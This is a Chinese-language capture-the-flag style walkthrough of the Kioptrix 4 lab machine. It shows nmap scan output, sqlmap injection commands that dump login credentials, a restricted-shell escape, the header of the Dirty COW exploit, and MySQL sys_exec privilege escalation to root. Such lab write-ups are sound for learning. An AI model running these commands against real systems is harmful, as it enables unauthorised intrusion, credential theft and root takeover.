一、主机发现
使用netdiscover
,发现其IP为192.168.203.136
二、端口扫描
root@kali:~# nmap -sV -A 192.168.203.136 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-18 10:43 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.203.136
Host is up (0.00050s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| vulners:
| cpe:/a:openbsd:openssh:4.7p1:
| CVE-2010-4478 7.5 https://vulners.com/cve/CVE-2010-4478
| CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
| CVE-2016-10708 5.0 https://vulners.com/cve/CVE-2016-10708
| CVE-2010-4755 4.0 https://vulners.com/cve/CVE-2010-4755
|_ CVE-2008-5161 2.6 https://vulners.com/cve/CVE-2008-5161
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.203.136
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.203.136:80/
| Form id: myusername
| Form action: checklogin.php
|
| Path: http://192.168.203.136:80/checklogin.php
| Form id:
| Form action: index.php
|
| Path: http://192.168.203.136:80/index.php
| Form id: myusername
|_ Form action: checklogin.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /database.sql: Possible database backup
| /icons/: Potentially interesting folder w/ directory listing
| /images/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) php/5.2.4-2ubuntu5.6 with suhosin-patch'
|_ /index/: Potentially interesting folder
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| vulners:
| cpe:/a:apache:http_server:2.2.8:
| CVE-2010-0425 10.0 https://vulners.com/cve/CVE-2010-0425
| CVE-2011-3192 7.8 https://vulners.com/cve/CVE-2011-3192
| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
| CVE-2013-2249 7.5 https://vulners.com/cve/CVE-2013-2249
| CVE-2009-1891 7.1 https://vulners.com/cve/CVE-2009-1891
| CVE-2009-1890 7.1 https://vulners.com/cve/CVE-2009-1890
| CVE-2012-0883 6.9 https://vulners.com/cve/CVE-2012-0883
| CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312
| CVE-2013-1862 5.1 https://vulners.com/cve/CVE-2013-1862
| CVE-2014-0231 5.0 https://vulners.com/cve/CVE-2014-0231
| CVE-2014-0098 5.0 https://vulners.com/cve/CVE-2014-0098
| CVE-2013-6438 5.0 https://vulners.com/cve/CVE-2013-6438
| CVE-2011-3368 5.0 https://vulners.com/cve/CVE-2011-3368
| CVE-2010-1452 5.0 https://vulners.com/cve/CVE-2010-1452
| CVE-2010-0408 5.0 https://vulners.com/cve/CVE-2010-0408
| CVE-2009-2699 5.0 https://vulners.com/cve/CVE-2009-2699
| CVE-2008-2364 5.0 https://vulners.com/cve/CVE-2008-2364
| CVE-2007-6750 5.0 https://vulners.com/cve/CVE-2007-6750
| CVE-2009-1195 4.9 https://vulners.com/cve/CVE-2009-1195
| CVE-2012-0031 4.6 https://vulners.com/cve/CVE-2012-0031
| CVE-2011-3607 4.4 https://vulners.com/cve/CVE-2011-3607
| CVE-2016-4975 4.3 https://vulners.com/cve/CVE-2016-4975
| CVE-2013-1896 4.3 https://vulners.com/cve/CVE-2013-1896
| CVE-2012-4558 4.3 https://vulners.com/cve/CVE-2012-4558
| CVE-2012-3499 4.3 https://vulners.com/cve/CVE-2012-3499
| CVE-2012-0053 4.3 https://vulners.com/cve/CVE-2012-0053
| CVE-2011-4317 4.3 https://vulners.com/cve/CVE-2011-4317
| CVE-2011-3639 4.3 https://vulners.com/cve/CVE-2011-3639
| CVE-2011-3348 4.3 https://vulners.com/cve/CVE-2011-3348
| CVE-2011-0419 4.3 https://vulners.com/cve/CVE-2011-0419
| CVE-2010-0434 4.3 https://vulners.com/cve/CVE-2010-0434
| CVE-2008-2939 4.3 https://vulners.com/cve/CVE-2008-2939
| CVE-2016-8612 3.3 https://vulners.com/cve/CVE-2016-8612
| CVE-2012-2687 2.6 https://vulners.com/cve/CVE-2012-2687
|_ CVE-2011-4415 1.2 https://vulners.com/cve/CVE-2011-4415
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:30:77:6D (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)
TRACEROUTE
HOP RTT ADDRESS
1 0.50 ms 192.168.203.136
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 361.54 seconds
目标开放了22、80、139以及445端口,并且我们还扫到了一个database.sql
文件,可能是数据库备份文件。
三、漏洞寻找
我们先查看web服务:
不着急,我们先看一下刚才发现的database.sql
得到一个账号和密码,但是无法登录。
那就换个思路,这个靶机给的提示呢,是存在sql注入的,显而易见,我们去试一下登陆框。
sqlmap -u http://192.168.203.136/checklogin.php --data "myusername=123123&mypassword=123123&Submit=Login" -p mypassword --dbs
果然是存在注入的:
sqlmap -u http://192.168.203.136/checklogin.php --data "myusername=123123&mypassword=123123&Submit=Login" -p mypassword -D members --tables
-------------------------------------------------------------------------
Database: members
[1 table]
+---------+
| members |
+---------+
继续查看members
表,爆破此表时,利用的是盲注:
sqlmap -u http://192.168.203.136/checklogin.php --data "myusername=123123&mypassword=123123&Submit=Login" -p mypassword -D members -T members --columns
---------------------------------------------------------------------------
Database: members
Table: members
[3 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| id | int(4) |
| password | varchar(65) |
| username | varchar(65) |
+----------+-------------+
接下来继续获得列表详细信息:
sqlmap -u http://192.168.203.136/checklogin.php --data "myusername=123123&mypassword=123123&Submit=Login" -p mypassword -D members -T members -C username,password --dump
-----------------------------------------------------------------------
Database: members
Table: members
[2 entries]
+----------+-----------------------+
| username | password |
+----------+-----------------------+
| robert | ADGAdsafdfwt4gadfga== |
| john | MyNameIsJohn |
+----------+-----------------------+
四、登录ssh
我们利用得到的账号和密码尝试连接ssh。
使用账号robert
,成功登录,但是登陆上去发现,什么也执行不了,限制了shell的使用,而且不是rbash。去网上查了一下特征,感觉像是lshell。
这里我们可以使用此命令进行绕过:
echo os.system('/bin/bash')
切换到/root
目录下,看到了lshell的存在,证明了猜想:
关于lshell的文章:https://blog.csdn.net/savior141/article/details/71305002
我也是比较奇怪,我还没提权呢,怎么都可以进入/root
目录下,并且还看了flag:
五、提权
查看了一下linux的内核,是可以用脏牛提权的:
robert@Kioptrix4:/root$ uname -a
Linux Kioptrix4 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
robert@Kioptrix4:/root$ getconf LONG_BIT
32
漏洞范围:
Linux kernel >= 2.6.22(2007年发行,到2016年10月18日才修复)
利用searchsploit
找到提权脚本:
searchsploit dirty -m exploits/linux/local/40839.c
---------------------------------------------------------------
root@kali:~# cat 40839.c
//
// This exploit uses the pokemon exploit of the dirtycow vulnerability
// as a base and automatically generates a new passwd line.
// The user will be prompted for the new password when the binary is run.
// The original /etc/passwd file is then backed up to /tmp/passwd.bak
// and overwrites the root account with the generated line.
// After running the exploit you should be able to login with the newly
// created user.
//
// To use this exploit modify the user values according to your needs.
// The default is "firefart".
//
// Original exploit (dirtycow's ptrace_pokedata "pokemon" method):
// https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c
//
// Compile with:
// gcc -pthread dirty.c -o dirty -lcrypt
//
// Then run the newly create binary by either doing:
// "./dirty" or "./dirty my-new-password"
//
// Afterwards, you can either "su firefart" or "ssh firefart@..."
//
// DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!
// mv /tmp/passwd.bak /etc/passwd
//
// Exploit adopted by Christian "FireFart" Mehlmauer
// https://firefart.at
但是每当我要从靶机使用wget
去下载提权脚本的时候,总不成功,大概是做了防火墙限制吧。
我还没想到一个完美的解决办法 ,附上脏牛提权文章:https://www.jianshu.com/p/df72d1ee1e3e
这个靶机的重点其实是mysql提权:
我们在网站的根目下找到了记录数据库账号和密码的文件:
robert@Kioptrix4:/var/www$ cat checklogin.php
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name
看到,我们无需密码就可以登录。
mysql提权
select sys_exec("usermod -aG admin robert") //直接将robert加入管理员组
robert@Kioptrix4:/var/www$ mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 6545
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> select sys_exec("usermod -aG admin robert");
+--------------------------------------+
| sys_exec("usermod -aG admin robert") |
+--------------------------------------+
| NULL |
+--------------------------------------+
1 row in set (0.00 sec)
之后退出mysql:
robert@Kioptrix4:/var/www$ sudo su root
[sudo] password for robert:
root@Kioptrix4:/var/www# id
uid=0(root) gid=0(root) groups=0(root)
提权成功!